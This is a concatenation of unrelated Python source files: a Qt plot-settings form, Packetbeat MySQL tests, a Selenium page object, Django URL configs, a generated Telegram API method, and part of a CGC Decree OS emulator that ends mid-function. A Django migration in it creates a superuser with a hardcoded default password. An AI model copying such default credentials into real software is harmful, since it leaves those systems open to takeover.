self.tallySelector.addItem("None")
for idx, tally in enumerate(self.model.statepoint.tallies.values()):
if tally.name == "":
self.tallySelector.addItem('Tally {}'.format(tally.id), userData=tally.id)
else:
self.tallySelector.addItem('Tally {} "{}"'.format(tally.id, tally.name), userData=tally.id)
self.tally_map[idx] = tally
self.updateSelectedTally()
self.updateMinMax()
else:
self.tallySelector.clear()
self.tallySelector.setDisabled(True)
class ColorForm(QWidget):
"""
Class for handling a field with a colormap, alpha, and visibility
Attributes
----------
model : PlotModel
The model instance used when updating information on the form.
colormapBox : QComboBox
Holds the string of the matplotlib colorbar being used
visibilityBox : QCheckBox
Indicator for whether or not the field should be visible
alphaBox : QDoubleSpinBox
Holds the alpha value for the displayed field data
colormapBox : QComboBox
Selector for colormap
dataIndicatorCheckBox : QCheckBox
Inidcates whether or not the data indicator will appear on the colorbar
userMinMaxBox : QCheckBox
Indicates whether or not the user defined values in the min and max
will be used to set the bounds of the colorbar.
maxBox : ScientificDoubleSpinBox
Max value of the colorbar. If the userMinMaxBox is checked, this will be
the user's input. If the userMinMaxBox is not checked, this box will
hold the max value of the visible data.
minBox : ScientificDoubleSpinBox
Min value of the colorbar. If the userMinMaxBox is checked, this will be
the user's input. If the userMinMaxBox is not checked, this box will
hold the max value of the visible data.
scaleBox : QCheckBox
Indicates whether or not the data is displayed on a log or linear
scale
maskZeroBox : QCheckBox
Indicates whether or not values equal to zero are displayed
clipDataBox : QCheckBox
Indicates whether or not values outside the min/max are displayed
contoursBox : QCheckBox
Inidicates whether or not data is displayed as contours
contourLevelsLine : QLineEdit
Controls the contours of the data. If this line contains a single
integer, that number of levels is used to display the data. If a
comma-separated set of values is entered, those values will be used as
levels in the contour plot.
"""
def __init__(self, model, main_window, field, colormaps=None):
super().__init__()
self.model = model
self.main_window = main_window
self.field = field
self.layout = QFormLayout()
# Visibility check box
self.visibilityBox = QCheckBox()
visible_connector = partial(main_window.toggleTallyVisibility)
self.visibilityBox.stateChanged.connect(visible_connector)
# Alpha value
self.alphaBox = QDoubleSpinBox()
self.alphaBox.setDecimals(2)
self.alphaBox.setRange(0, 1)
self.alphaBox.setSingleStep(0.05)
alpha_connector = partial(main_window.editTallyAlpha)
self.alphaBox.valueChanged.connect(alpha_connector)
# Color map selector
self.colormapBox = QComboBox()
if colormaps is None:
colormaps = sorted(m for m in mcolormaps.datad if not m.endswith("_r"))
for colormap in colormaps:
self.colormapBox.addItem(colormap)
cmap_connector = partial(main_window.editTallyDataColormap)
self.colormapBox.currentTextChanged[str].connect(cmap_connector)
# Data indicator line check box
self.dataIndicatorCheckBox = QCheckBox()
data_indicator_connector = partial(main_window.toggleTallyDataIndicator)
self.dataIndicatorCheckBox.stateChanged.connect(data_indicator_connector)
# User specified min/max check box
self.userMinMaxBox = QCheckBox()
minmax_connector = partial(main_window.toggleTallyDataUserMinMax)
self.userMinMaxBox.stateChanged.connect(minmax_connector)
# Data min spin box
self.minBox = ScientificDoubleSpinBox()
self.minBox.setMinimum(0.0)
min_connector = partial(main_window.editTallyDataMin)
self.minBox.valueChanged.connect(min_connector)
# Data max spin box
self.maxBox = ScientificDoubleSpinBox()
self.maxBox.setMinimum(0.0)
max_connector = partial(main_window.editTallyDataMax)
self.maxBox.valueChanged.connect(max_connector)
# Linear/Log scaling check box
self.scaleBox = QCheckBox()
scale_connector = partial(main_window.toggleTallyLogScale)
self.scaleBox.stateChanged.connect(scale_connector)
# Masking of zero values check box
self.maskZeroBox = QCheckBox()
zero_connector = partial(main_window.toggleTallyMaskZero)
self.maskZeroBox.stateChanged.connect(zero_connector)
# Clip data to min/max check box
self.clipDataBox = QCheckBox()
clip_connector = partial(main_window.toggleTallyDataClip)
self.clipDataBox.stateChanged.connect(clip_connector)
# Display data as contour plot check box
self.contoursBox = QCheckBox()
self.contoursBox.stateChanged.connect(main_window.toggleTallyContours)
self.contourLevelsLine = QLineEdit()
self.contourLevelsLine.textChanged.connect(
main_window.editTallyContourLevels)
# Organize widgets on layout
self.layout.addRow("Visible:", self.visibilityBox)
self.layout.addRow("Alpha: ", self.alphaBox)
self.layout.addRow("Colormap: ", self.colormapBox)
self.layout.addRow("Data Indicator: ", self.dataIndicatorCheckBox)
self.layout.addRow("Custom Min/Max: ", self.userMinMaxBox)
self.layout.addRow("Min: ", self.minBox)
self.layout.addRow("Max: ", self.maxBox)
self.layout.addRow("Log Scale: ", self.scaleBox)
self.layout.addRow("Clip Data: ", self.clipDataBox)
self.layout.addRow("Mask Zeros: ", self.maskZeroBox)
self.layout.addRow("Contours: ", self.contoursBox)
self.layout.addRow("Contour Levels:", self.contourLevelsLine)
self.setLayout(self.layout)
def updateTallyContours(self):
cv = self.model.currentView
self.contoursBox.setChecked(cv.tallyContours)
self.contourLevelsLine.setText(cv.tallyContourLevels)
def updateDataIndicator(self):
cv = self.model.currentView
self.dataIndicatorCheckBox.setChecked(cv.tallyDataIndicator)
def setMinMaxEnabled(self, enable):
enable = bool(enable)
self.minBox.setEnabled(enable)
self.maxBox.setEnabled(enable)
def updateMinMax(self):
cv = self.model.currentView
self.minBox.setValue(cv.tallyDataMin)
self.maxBox.setValue(cv.tallyDataMax)
self.setMinMaxEnabled(cv.tallyDataUserMinMax)
def updateTallyVisibility(self):
cv = self.model.currentView
self.visibilityBox.setChecked(cv.tallyDataVisible)
def updateMaskZeros(self):
cv = self.model.currentView
self.maskZeroBox.setChecked(cv.tallyMaskZeroValues)
def updateDataClip(self):
cv = self.model.currentView
self.clipDataBox.setChecked(cv.clipTallyData)
def update(self):
cv = self.model.currentView
# set colormap value in selector
cmap = cv.tallyDataColormap
idx = self.colormapBox.findText(cmap, QtCore.Qt.MatchFixedString)
self.colormapBox.setCurrentIndex(idx)
self.alphaBox.setValue(cv.tallyDataAlpha)
self.visibilityBox.setChecked(cv.tallyDataVisible)
self.userMinMaxBox.setChecked(cv.tallyDataUserMinMax)
self.scaleBox.setChecked(cv.tallyDataLogScale)
self.updateMinMax()
self.updateMaskZeros()
self.updateDataClip()
self.updateDataIndicator()
self.updateTallyContours()
|
py | 1a4a1243219461e0152a28a15c461ac9bddbead7 | from packetbeat import BaseTest
"""
Tests for trimming long results in mysql.
"""
class Test(BaseTest):
def test_default_settings(self):
"""
Should store the entire rows but only
10 rows with default settings.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap")
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
print len(line)
assert len(line) == 261
def test_max_row_length(self):
"""
Should be able to cap the row length.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 11 # 10 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_row_length=79,
mysql_max_rows=5,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 6 # 5 plus header
for line in lines[3:]:
assert len(line) == 81 # 79 plus two separators
def test_larger_max_rows(self):
"""
Should be able to cap the number of rows
"""
self.render_config_template(
mysql_ports=[3306],
mysql_max_rows=2000,
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long_result.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 15
lines = res["response"].strip().split("\n")
assert len(lines) == 16 # 15 plus header
def test_larger_than_100k(self):
"""
Should work for MySQL messages larger than 100k bytes.
"""
self.render_config_template(
mysql_ports=[3306],
mysql_send_response=True
)
self.run_packetbeat(pcap="mysql_long.pcap",
debug_selectors=["mysqldetailed"])
objs = self.read_output()
assert len(objs) == 1
res = objs[0]
assert res["mysql.num_rows"] == 400
|
py | 1a4a12e8a8f8bf0b2b388e6ac629f0dfebacd1d6 | PROJECT_NAME = 'Olympus Programming'
DEBUG_PROJECT_NAME = 'Coursework'
IP = '185.255.132.221'
PORT = '80'
WORKING_DIRECTORY = '/root/project' # Only for server
LOCAL_WORKING_DIRECTORY = 'G://Projects/Coursework' # On my pc
solution_lang = {
'GNU GCC C99': 'c',
'GNU G++ 17': 'cpp',
# 'Kotlin': 'kt',
'Python 3': 'py',
'PyPy': 'pypy',
# 'Ruby 2.7': 'rb',
}
verdict = {
True: 'Правильное решение',
# Codes of status of task checking:
# WANNA ENUM...
# But I am too lazy to use it
'process': 'Выполняется проверка',
}
valid_image_formats = [
'png',
'jpg',
'jpeg',
]
annotation = {
'task_manager': {
'package': 'It must be a class inherited from the class SolutionCaseBase',
'task': 'It must be a class inherited from the class TaskBase',
'tests': 'It must be a class inherited from the class TestBase',
}
}
|
py | 1a4a1300142d69ccd1207655956a42886892d662 | from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
class BlockCartPage:
def __init__(self, driver):
self.driver = driver
self.wait = WebDriverWait(driver, 10)
def wait_adding_prod_to_cart(self, text):
self.wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,'div#cart span.quantity'), text))
@property
def cart_link_button(self):
return self.driver.find_element_by_css_selector("div#cart a.link")
|
py | 1a4a13f0a6b44644bf127275880d9c0e72461911 | # -*- coding: utf-8 -*-
#
from django.contrib.auth.hashers import make_password
from django.db import migrations, models
def add_default_admin(apps, schema_editor):
user_model = apps.get_model("auth", "User")
db_alias = schema_editor.connection.alias
user_model.objects.using(db_alias).create(
username="admin",
email="[email protected]",
password=make_password("kubeoperator@admin123"),
is_superuser=True,
is_staff=True
)
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.RunPython(add_default_admin),
]
|
py | 1a4a14f22fd66780a4b7977365fcb88cae5f8feb | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
py | 1a4a151e59b0972ad9dedadde7ab3e946b2d9667 | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('index.urls')),
path('admin/', admin.site.urls),
path('users/', include('accounts.urls')),
path('board/', include('board.urls')),
path('posts/', include('posts.urls')),
path('search/', include('search.urls')),
# path('rest-auth/', include('rest_auth.urls')),
# path('rest-auth/signup/', include('rest_auth.registration.urls')),
]
|
py | 1a4a15727d1c20622d9ebde45345f557fd2a7153 | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2021 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class CancelPasswordEmail(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``126``
- ID: ``0xc1cbd5b6``
**No parameters required.**
Returns:
``bool``
"""
__slots__: List[str] = []
ID = 0xc1cbd5b6
QUALNAME = "functions.account.CancelPasswordEmail"
def __init__(self) -> None:
pass
@staticmethod
def read(data: BytesIO, *args: Any) -> "CancelPasswordEmail":
# No flags
return CancelPasswordEmail()
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
return data.getvalue()
|
py | 1a4a17dcfc586dac613d4e8cc78acc7f79410a61 | import cgcrandom
# TODO use cpu factory
from ..core.cpu.x86 import I386Cpu
from ..core.cpu.abstractcpu import Interruption, Syscall, ConcretizeRegister
from ..core.memory import SMemory32
from ..core.smtlib import *
from ..core.executor import TerminateState
from ..utils.helpers import issymbolic
from ..binary import CGCElf
from ..platforms.platform import Platform
import logging
import random
logger = logging.getLogger(__name__)
class RestartSyscall(Exception):
pass
class Deadlock(Exception):
pass
class SymbolicSyscallArgument(ConcretizeRegister):
def __init__(self, cpu, number, message='Concretizing syscall argument', policy='SAMPLED'):
reg_name = ['EBX', 'ECX', 'EDX', 'ESI', 'EDI', 'EBP'][number]
super(SymbolicSyscallArgument, self).__init__(cpu, reg_name, message, policy)
class Socket(object):
@staticmethod
def pair():
a = Socket()
b = Socket()
a.connect(b)
return a, b
def __init__(self):
self.buffer = [] # queue os bytes
self.peer = None
def __repr__(self):
return "SOCKET(%x, %r, %x)" % (hash(self), self.buffer, hash(self.peer))
def is_connected(self):
return self.peer is not None
def is_empty(self):
return len(self.buffer) == 0
def is_full(self):
return len(self.buffer) > 2 * 1024
def connect(self, peer):
assert not self.is_connected()
assert not peer.is_connected()
self.peer = peer
if peer.peer is None:
peer.peer = self
def receive(self, size):
rx_bytes = min(size, len(self.buffer))
ret = []
for i in xrange(rx_bytes):
ret.append(self.buffer.pop())
return ret
def transmit(self, buf):
assert self.is_connected()
return self.peer._transmit(buf)
def _transmit(self, buf):
for c in buf:
self.buffer.insert(0, c)
return len(buf)
class Decree(Platform):
'''
A simple Decree Operating System.
This class emulates the most common Decree system calls
'''
CGC_EBADF = 1
CGC_EFAULT = 2
CGC_EINVAL = 3
CGC_ENOMEM = 4
CGC_ENOSYS = 5
CGC_EPIPE = 6
CGC_SSIZE_MAX = 2147483647
CGC_SIZE_MAX = 4294967295
CGC_FD_SETSIZE = 32
def __init__(self, programs, **kwargs):
'''
Builds a Decree OS
:param cpus: CPU for this platform
:param mem: memory for this platform
:todo: generalize for more CPUs
:todo: fix deps?
'''
programs = programs.split(",")
super(Decree, self).__init__(path=programs[0], **kwargs)
self.clocks = 0
self.files = []
self.syscall_trace = []
self.files = []
# open standard files stdin, stdout, stderr
logger.info("Opening file descriptors (0,1,2)")
self.input = Socket()
self.output = Socket()
stdin = Socket()
stdout = Socket()
stderr = Socket()
# A transmit to stdin,stdout or stderr will be directed to out
stdin.peer = self.output
stdout.peer = self.output
stderr.peer = self.output
# A receive from stdin will get data from inp
self.input.peer = stdin
# A receive on stdout or stderr will return no data (rx_bytes: 0)
assert self._open(stdin) == 0
assert self._open(stdout) == 1
assert self._open(stderr) == 2
# Load process and setup socketpairs
self.procs = []
for program in programs:
self.procs += self.load(program)
socka, sockb = Socket.pair()
self._open(socka)
self._open(sockb)
nprocs = len(self.procs)
nfiles = len(self.files)
assert nprocs > 0
self.running = range(nprocs)
self._current = 0
# Each process can wait for one timeout
self.timers = [None] * nprocs
# each fd has a waitlist
self.rwait = [set() for _ in xrange(nfiles)]
self.twait = [set() for _ in xrange(nfiles)]
# Install event forwarders
for proc in self.procs:
self.forward_events_from(proc)
def _mk_proc(self):
return I386Cpu(Memory32())
@property
def current(self):
return self.procs[self._current]
def __getstate__(self):
state = super(Decree, self).__getstate__()
state['clocks'] = self.clocks
state['input'] = self.input.buffer
state['output'] = self.output.buffer
state['files'] = [x.buffer for x in self.files]
state['procs'] = self.procs
state['current'] = self._current
state['running'] = self.running
state['rwait'] = self.rwait
state['twait'] = self.twait
state['timers'] = self.timers
state['syscall_trace'] = self.syscall_trace
return state
def __setstate__(self, state):
"""
:todo: some asserts
:todo: fix deps? (last line)
"""
super(Decree, self).__setstate__(state)
self.input = Socket()
self.input.buffer = state['input']
self.output = Socket()
self.output.buffer = state['output']
self.files = []
for buf in state['files']:
f = Socket()
f.buffer = buf
self.files.append(f)
for fd in range(len(self.files)):
if self.connections(fd) is not None:
self.files[fd].peer = self.files[self.connections(fd)]
self.files[0].peer = self.output
self.files[1].peer = self.output
self.files[2].peer = self.output
self.input.peer = self.files[0]
self.procs = state['procs']
self._current = state['current']
self.running = state['running']
self.rwait = state['rwait']
self.twait = state['twait']
self.timers = state['timers']
self.clocks = state['clocks']
self.syscall_trace = state['syscall_trace']
# Install event forwarders
for proc in self.procs:
self.forward_events_from(proc)
def _read_string(self, cpu, buf):
"""
Reads a null terminated concrete buffer form memory
:todo: FIX. move to cpu or memory
"""
filename = ""
for i in xrange(0, 1024):
c = Operators.CHR(cpu.read_int(buf + i, 8))
if c == '\x00':
break
filename += c
return filename
def load(self, filename):
'''
Loads a CGC-ELF program in memory and prepares the initial CPU state
and the stack.
:param filename: pathname of the file to be executed.
'''
CGC_MIN_PAGE_SIZE = 4096
CGC_MIN_ALIGN = CGC_MIN_PAGE_SIZE
TASK_SIZE = 0x80000000
def CGC_PAGESTART(_v):
return ((_v) & ~ (CGC_MIN_ALIGN - 1))
def CGC_PAGEOFFSET(_v):
return ((_v) & (CGC_MIN_ALIGN - 1))
def CGC_PAGEALIGN(_v):
return (((_v) + CGC_MIN_ALIGN - 1) & ~(CGC_MIN_ALIGN - 1))
def BAD_ADDR(x):
return ((x) >= TASK_SIZE)
# load elf See https://github.com/CyberdyneNYC/linux-source-3.13.2-cgc/blob/master/fs/binfmt_cgc.c
# read the ELF object file
cgc = CGCElf(filename)
logger.info("Loading %s as a %s elf" % (filename, cgc.arch))
# make cpu and memory (Only 1 thread in Decree)
cpu = self._mk_proc()
bss = brk = 0
start_code = 0xffffffff
end_code = start_data = end_data = 0
for (vaddr, memsz, perms, name, offset, filesz) in cgc.maps():
if vaddr < start_code:
start_code = vaddr
if start_data < vaddr:
start_data = vaddr
if vaddr > TASK_SIZE or filesz > memsz or \
memsz > TASK_SIZE or TASK_SIZE - memsz < vaddr:
raise Exception("Set_brk can never work. avoid overflows")
# CGCMAP--
addr = None
if filesz > 0:
hint = CGC_PAGESTART(vaddr)
size = CGC_PAGEALIGN(filesz + CGC_PAGEOFFSET(vaddr))
offset = CGC_PAGESTART(offset)
addr = cpu.memory.mmapFile(hint, size, perms, name, offset)
assert not BAD_ADDR(addr)
lo = CGC_PAGEALIGN(vaddr + filesz)
hi = CGC_PAGEALIGN(vaddr + memsz)
else:
# for 0 filesz, we have to include the first page as bss.
lo = CGC_PAGESTART(vaddr + filesz)
hi = CGC_PAGEALIGN(vaddr + memsz)
# map anon pages for the rest (no prefault)
if hi - lo > 0:
zaddr = cpu.memory.mmap(lo, hi - lo, perms)
assert not BAD_ADDR(zaddr)
lo = vaddr + filesz
hi = CGC_PAGEALIGN(vaddr + memsz)
if hi - lo > 0:
old_perms = cpu.memory.perms(lo)
cpu.memory.mprotect(lo, hi - lo, 'rw')
try:
cpu.memory[lo:hi] = '\x00' * (hi - lo)
except Exception as e:
logger.debug("Exception zeroing main elf fractional pages: %s" % str(e))
cpu.memory.mprotect(lo, hi, old_perms)
if addr is None:
addr = zaddr
assert addr is not None
k = vaddr + filesz
if k > bss:
bss = k
if 'x' in perms and end_code < k:
end_code = k
if end_data < k:
end_data = k
k = vaddr + memsz
if k > brk:
brk = k
bss = brk
stack_base = 0xbaaaaffc
stack_size = 0x800000
stack = cpu.memory.mmap(0xbaaab000 - stack_size, stack_size, 'rwx') + stack_size - 4
assert (stack_base) in cpu.memory and (stack_base - stack_size + 4) in cpu.memory
# Only one thread in Decree
status, thread = next(cgc.threads())
assert status == 'Running'
logger.info("Setting initial cpu state")
# set initial CPU state
cpu.write_register('EAX', 0x0)
cpu.write_register('ECX', 0x0)
cpu.write_register('EDX', 0x0)
cpu.write_register('EBX', 0x0)
cpu.write_register('ESP', stack)
cpu.write_register('EBP', 0x0)
cpu.write_register('ESI', 0x0)
cpu.write_register('EDI', 0x0)
cpu.write_register('EIP', thread['EIP'])
cpu.write_register('RFLAGS', 0x202)
cpu.write_register('CS', 0x0)
cpu.write_register('SS', 0x0)
cpu.write_register('DS', 0x0)
cpu.write_register('ES', 0x0)
cpu.write_register('FS', 0x0)
cpu.write_register('GS', 0x0)
cpu.memory.mmap(0x4347c000, 0x1000, 'r')
# cpu.memory[0x4347c000:0x4347d000] = 'A' 0x1000
logger.info("Entry point: %016x", cpu.EIP)
logger.info("Stack start: %016x", cpu.ESP)
logger.info("Brk: %016x", brk)
logger.info("Mappings:")
for m in str(cpu.memory).split('\n'):
logger.info(" %s", m)
return [cpu]
def _open(self, f):
if None in self.files:
fd = self.files.index(None)
self.files[fd] = f
else:
fd = len(self.files)
self.files.append(f)
return fd
def _close(self, fd):
'''
Closes a file descriptor
:rtype: int
:param fd: the file descriptor to close.
:return: C{0} on success.
'''
self.files[fd] = None
def _dup(self, fd):
'''
Duplicates a file descriptor
:rtype: int
:param fd: the file descriptor to close.
:return: C{0} on success.
'''
return self._open(self.files[fd])
def _is_open(self, fd):
return fd >= 0 and fd < len(self.files) and self.files[fd] is not None
def sys_allocate(self, cpu, length, isX, addr):
''' allocate - allocate virtual memory
The allocate system call creates a new allocation in the virtual address
space of the calling process. The length argument specifies the length of
the allocation in bytes which will be rounded up to the hardware page size.
The kernel chooses the address at which to create the allocation; the
address of the new allocation is returned in *addr as the result of the call.
All newly allocated memory is readable and writeable. In addition, the
is_X argument is a boolean that allows newly allocated memory to be marked
as executable (non-zero) or non-executable (zero).
The allocate function is invoked through system call number 5.
:param cpu: current CPU
:param length: the length of the allocation in bytes
:param isX: boolean that allows newly allocated memory to be marked as executable
:param addr: the address of the new allocation is returned in *addr
:return: On success, allocate returns zero and a pointer to the allocated area
is returned in *addr. Otherwise, an error code is returned
and *addr is undefined.
EINVAL length is zero.
EINVAL length is too large.
EFAULT addr points to an invalid address.
ENOMEM No memory is available or the process' maximum number of allocations
would have been exceeded.
'''
# TODO: check 4 bytes from addr
if addr not in cpu.memory:
logger.info("ALLOCATE: addr points to invalid address. Returning EFAULT")
return Decree.CGC_EFAULT
perms = ['rw ', 'rwx'][bool(isX)]
try:
result = cpu.memory.mmap(None, length, perms)
except Exception as e:
logger.info("ALLOCATE exception %s. Returning ENOMEM %r", str(e), length)
return Decree.CGC_ENOMEM
cpu.write_int(addr, result, 32)
logger.info("ALLOCATE(%d, %s, 0x%08x) -> 0x%08x" % (length, perms, addr, result))
self.syscall_trace.append(("_allocate", -1, length))
return 0
def sys_random(self, cpu, buf, count, rnd_bytes):
''' random - fill a buffer with random data
The random system call populates the buffer referenced by buf with up to
count bytes of random data. If count is zero, random returns 0 and optionallyi
sets *rx_bytes to zero. If count is greater than SSIZE_MAX, the result is unspecified.
:param cpu: current CPU
:param buf: a memory buffer
:param count: max number of bytes to receive
:param rnd_bytes: if valid, points to the actual number of random bytes
:return: 0 On success
EINVAL count is invalid.
EFAULT buf or rnd_bytes points to an invalid address.
'''
ret = 0
if count != 0:
if count > Decree.CGC_SSIZE_MAX or count < 0:
ret = Decree.CGC_EINVAL
else:
# TODO check count bytes from buf
if buf not in cpu.memory or (buf + count) not in cpu.memory:
logger.info("RANDOM: buf points to invalid address. Returning EFAULT")
return Decree.CGC_EFAULT
data = file("/dev/urandom", "r").read(count)
self.syscall_trace.append(("_random", -1, data))
cpu.write_bytes(buf, data)
# TODO check 4 bytes from rx_bytes
if rx_bytes:
if rx_bytes not in cpu.memory:
logger.info("RANDOM: Not valid rx_bytes. Returning EFAULT")
return Decree.CGC_EFAULT
cpu.write_int(rx_bytes, len(data), 32)
logger.info("RANDOM(0x%08x, %d, 0x%08x) -> <%s>)" % (buf, count, rnd_bytes, repr(data[:10])))
return ret
def sys_receive(self, cpu, fd, buf, count, rx_bytes):
''' receive - receive bytes from a file descriptor
The receive system call reads up to count bytes from file descriptor fd to the
buffer pointed to by buf. If count is zero, receive returns 0 and optionally
dets *rx_bytes to zero.
:param cpu: current CPU.
:param fd: a valid file descripor
:param buf: a memory buffer
:param count: max number of bytes to receive
:param rx_bytes: if valid, points to the actual number of bytes received
:return: 0 Success
EBADF fd is not a valid file descriptor or is not open
EFAULT buf or rx_bytes points to an invalid address.
'''
data = ''
if count != 0:
if not self._is_open(fd):
logger.info("RECEIVE: Not valid file descriptor on receive. Returning EBADF")
return Decree.CGC_EBADF
# TODO check count bytes from buf
if buf not in cpu.memory: # or not buf+count in cpu.memory:
logger.info("RECEIVE: buf points to invalid address. Returning EFAULT")
return Decree.CGC_EFAULT
#import random
#count = random.randint(1,count)
if fd > 2 and self.files[fd].is_empty():
cpu.PC -= cpu.instruction.size
self.wait([fd], [], None)
raise RestartSyscall()
# get some potential delay
# if random.randint(5) == 0 and count > 1:
# count = count/2
# Read the data and put in tin memory
data = self.files[fd].receive(count)
self.syscall_trace.append(("_receive", fd, data))
cpu.write_bytes(buf, data)
self.signal_receive(fd)
# TODO check 4 bytes from rx_bytes
if rx_bytes:
if rx_bytes not in cpu.memory:
logger.info("RECEIVE: Not valid file descriptor on receive. Returning EFAULT")
return Decree.CGC_EFAULT
cpu.write_int(rx_bytes, len(data), 32)
logger.info("RECEIVE(%d, 0x%08x, %d, 0x%08x) -> <%s> (size:%d)" % (fd, buf, count, rx_bytes, repr(data)[:min(count, 10)], len(data)))
return 0
def sys_transmit(self, cpu, fd, buf, count, tx_bytes):
''' transmit - send bytes through a file descriptor
The transmit system call writes up to count bytes from the buffer pointed
to by buf to the file descriptor fd. If count is zero, transmit returns 0
and optionally sets *tx_bytes to zero.
:param cpu current CPU
:param fd a valid file descripor
:param buf a memory buffer
:param count number of bytes to send
:param tx_bytes if valid, points to the actual number of bytes transmitted
:return: 0 Success
EBADF fd is not a valid file descriptor or is not open.
EFAULT buf or tx_bytes points to an invalid address.
'''
data = []
if count != 0:
if not self._is_open(fd):
logger.error("TRANSMIT: Not valid file descriptor. Returning EBADFD %d", fd)
return Decree.CGC_EBADF
# TODO check count bytes from buf
if buf not in cpu.memory or (buf + count) not in cpu.memory:
logger.debug("TRANSMIT: buf points to invalid address. Rerurning EFAULT")
return Decree.CGC_EFAULT
if fd > 2 and self.files[fd].is_full():
cpu.PC -= cpu.instruction.size
self.wait([], [fd], None)
raise RestartSyscall()
for i in xrange(0, count):
value = Operators.CHR(cpu.read_int(buf + i, 8))
if not isinstance(value, str):
logger.debug("TRANSMIT: Writing symbolic values to file %d", fd)
#value = str(value)
data.append(value)
self.files[fd].transmit(data)
logger.info("TRANSMIT(%d, 0x%08x, %d, 0x%08x) -> <%.24r>" % (fd, buf, count, tx_bytes, ''.join([str(x) for x in data])))
self.syscall_trace.append(("_transmit", fd, data))
self.signal_transmit(fd)
# TODO check 4 bytes from tx_bytes
if tx_bytes:
if tx_bytes not in cpu.memory:
logger.debug("TRANSMIT: Not valid tx_bytes pointer on transmit. Returning EFAULT")
return Decree.CGC_EFAULT
cpu.write_int(tx_bytes, len(data), 32)
return 0
def sys_terminate(self, cpu, error_code):
'''
Exits all threads in a process
:param cpu: current CPU.
:raises Exception: 'Finished'
'''
procid = self.procs.index(cpu)
self.sched()
self.running.remove(procid)
# self.procs[procid] = None #let it there so we can report?
if issymbolic(error_code):
logger.info("TERMINATE PROC_%02d with symbolic exit code [%d,%d]", procid, solver.minmax(self.constraints, error_code))
else:
logger.info("TERMINATE PROC_%02d %x", procid, error_code)
if len(self.running) == 0:
raise TerminateState('Process exited correctly. Code: {}'.format(error_code))
return error_code
def sys_deallocate(self, cpu, addr, size):
''' deallocate - remove allocations
The deallocate system call deletes the allocations for the specified
address range, and causes further references to the addresses within the
range to generate invalid memory accesses. The region is also
automatically deallocated when the process is terminated.
The address addr must be a multiple of the page size. The length parameter
specifies the size of the region to be deallocated in bytes. All pages
containing a part of the indicated range are deallocated, and subsequent
references will terminate the process. It is not an error if the indicated
range does not contain any allocated pages.
The deallocate function is invoked through system call number 6.
:param cpu: current CPU
:param addr: the starting address to unmap.
:param size: the size of the portion to unmap.
:return 0 On success
EINVAL addr is not page aligned.
EINVAL length is zero.
EINVAL any part of the region being deallocated is outside the valid
address range of the process.
:param cpu: current CPU.
:return: C{0} on success.
'''
logger.info("DEALLOCATE(0x%08x, %d)" % (addr, size))
if addr & 0xfff != 0:
logger.info("DEALLOCATE: addr is not page aligned")
return Decree.CGC_EINVAL
if size == 0:
logger.info("DEALLOCATE:length is zero")
return Decree.CGC_EINVAL
# unlikely AND WRONG!!!
# if addr > Decree.CGC_SSIZE_MAX or addr+size > Decree.CGC_SSIZE_MAX:
# logger.info("DEALLOCATE: part of the region being deallocated is outside the valid address range of the process")
